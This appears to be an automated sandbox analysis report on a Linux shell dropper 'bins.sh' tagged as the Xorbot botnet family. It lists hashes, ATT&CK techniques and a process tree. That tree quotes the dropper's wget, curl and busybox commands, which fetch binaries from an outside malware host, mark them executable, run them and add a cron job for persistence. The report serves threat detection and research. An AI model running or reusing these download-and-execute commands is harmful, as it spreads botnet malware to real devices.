Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/02/2025, 09:00
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
6fabcc812d0922db6c4f85ee41554bb8
-
SHA1
6990196753003a0019eb7fd54ce7669dc28e1ce2
-
SHA256
ffb51619f1efb0f87e5e75e7cd498cd8d80c049d07b821f83b3385cad45acb84
-
SHA512
c73c9f0896fd6274600bda9d0f047435578793c2ad71e2be682c615afff82b0dc09bfe59fbfe4904b9d15ab1247a6310ebd1f324f15479aac96fef76af9953d3
-
SSDEEP
192:CFj0rsk8cNUkQceCrt5H1l8dJ7t5lAk8IUkQceCzS:CB05NUkQceCj1edPUkQceC2
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (1765) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 712 chmod 737 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn 713 bins.sh /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf 739 bins.sh -
Renames itself 1 IoCs
pid Process 740 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.ly2K78 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/326/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/345/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/797/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/922/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/771/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/905/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/927/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/985/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/991/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1001/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1018/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/7/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/825/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/848/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/865/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/916/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/984/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1023/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/98/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/109/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/291/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/850/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/899/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/931/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/932/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/947/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/960/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1027/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/137/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/754/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/876/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/889/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/935/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/987/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/998/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1024/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/11/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/26/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/805/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/866/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/941/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1014/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/42/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/281/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/956/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/964/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1053/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/802/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/834/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/843/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/934/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1040/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/818/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/959/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/979/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/999/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1047/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/854/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/887/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/971/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1021/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/767/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/804/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/938/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 709 busybox 717 wget 728 curl 735 busybox 753 wget 754 curl 681 wget 691 curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn wget File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn curl File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn busybox File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf wget File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf curl File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:674 -
/bin/rm/bin/rm bins.sh2⤵PID:679
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:681
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:709
-
-
/bin/chmodchmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵PID:713
-
-
/bin/rmrm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/chmodchmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Renames itself
- Reads runtime system information
PID:739 -
/bin/shsh -c "crontab -l"3⤵PID:741
-
/usr/bin/crontabcrontab -l4⤵PID:742
-
-
-
/bin/shsh -c "crontab -"3⤵PID:744
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:746
-
-
-
-
/bin/rmrm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt2⤵
- System Network Configuration Discovery
PID:753
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt2⤵
- System Network Configuration Discovery
PID:754
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD506764c557c35627777378eb207e980bc
SHA177eae38157e9ee9c28dcae5b29b0b79ea3d45cdd
SHA2566c4cbb07e05248100deeae3256c2b765ab16205da317b62fc8ff6a859da5c508
SHA51295ff42eadd41143e2d4058049881725b8395c9f23f43ae503ad8b634af449aa5f29c9b590b28ab467a1b87c2c0d69accd0c153ee6c3800b52925b3c130985054